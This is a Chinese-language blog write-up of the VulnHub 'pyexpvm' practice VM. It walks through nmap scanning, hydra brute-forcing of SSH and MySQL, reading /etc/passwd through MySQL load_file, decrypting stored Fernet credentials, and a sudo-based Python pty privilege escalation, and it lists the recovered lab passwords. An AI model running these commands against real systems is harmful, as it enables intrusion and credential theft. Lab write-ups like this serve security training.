靶机实战系列之pyexpvm靶机

admin 2023年10月24日23:39:01评论24 views字数 1514阅读5分2秒阅读模式



声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 


靶机地址:

https://download.vulnhub.com/pyexp/pyexpvm.zip


内容简介:
在这次打靶过程中,将使用到以下攻击手段

主机发现

端口扫描

SSH密码爆破

MySQL密码爆破

MySQL执行代码

编写解密代码

SUDO权限漏洞

Python函数

本地提权

 滑至文末,获取“searchall”下载链接!

1.1 主机发现

arp-scan  -l

靶机实战系列之pyexpvm靶机


1.2 端口扫描

nmap -p-  192.168.112.129 

靶机实战系列之pyexpvm靶机

nmap -p1337,3306 -sC -sV   192.168.112.129

靶机实战系列之pyexpvm靶机

存在mysql端口


1.3 SSH密码爆破

准备密码字段

cp  /usr/share/wordlists/rockyou.txt.gz .

靶机实战系列之pyexpvm靶机

解压密码字典

gunzip  rockyou.txt.gz

靶机实战系列之pyexpvm靶机

使用hydra爆破ssh

hydra  -l root    -P   rockyou.txt  ssh://192.168.112.129:1337/

靶机实战系列之pyexpvm靶机

但是并没有爆破成功


1.4 MYSQL密码爆破

hydra -l root -P  rockyou.txt  mysql://192.168.112.129

靶机实战系列之pyexpvm靶机

爆破成功

账号 root  密码   prettywoman

登录mysql

mysql -u root -h 192.168.112.129 -p

靶机实战系列之pyexpvm靶机


1.5 MYSQL执行代码

select load_file("/etc/passwd");

靶机实战系列之pyexpvm靶机

靶机实战系列之pyexpvm靶机

靶机实战系列之pyexpvm靶机

show  database;

靶机实战系列之pyexpvm靶机

use  data;

靶机实战系列之pyexpvm靶机

select *  from  fernet;

靶机实战系列之pyexpvm靶机


1.6 编写解密代码


利用 fernet编写python解密

cred

keyy

gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=

UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

参照

https://cryptography.io/en/latest/fernet/

使用python3导入

靶机实战系列之pyexpvm靶机

from cryptography.fernet import Fernet
key = Fernet.generate_key()
f = Fernet(key)
token = f.encrypt(b"my deep dark secret")
tokenb'...'
f.decrypt(token)b'my deep dark secret

解密成功

靶机实战系列之pyexpvm靶机

lucy:wJ9`"Lemdv9[FEw-


1.7 SUDO权限漏洞

ssh  lucy@192.168.112.129 -p  1337   //成功登录

靶机实战系列之pyexpvm靶机

sudo -l

靶机实战系列之pyexpvm靶机

cat  /opt/exp.py

靶机实战系列之pyexpvm靶机

分析exec作用


1.8 Python函数(本地提权)


python2提权脚本代码

import pty;pty.spawn("/bin/bash")

靶机实战系列之pyexpvm靶机

成功


注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"



靶机实战系列之pyexpvm靶机
点击上方公众号
靶机实战系列之pyexpvm靶机
关注我们
靶机实战系列之pyexpvm靶机








往期精彩

Armitage|MSF图形界面神器


原创|Searchall3.5.8敏感信息搜索工具







1、公众号后台回复:搜索大法,获取searchall工具下载链接。

2、公众号后台回复:靶场,获取靶场工具网盘下载链接。

3、公众号后台回复:webshell,获取webshell下载链接。

3、公众号后台回复:验证码,获取验证码工具下载链接。


原文始发于微信公众号(嗨嗨安全):靶机实战系列之pyexpvm靶机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月24日23:39:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机实战系列之pyexpvm靶机http://cn-sec.com/archives/2143224.html

发表评论

匿名网友 填写信息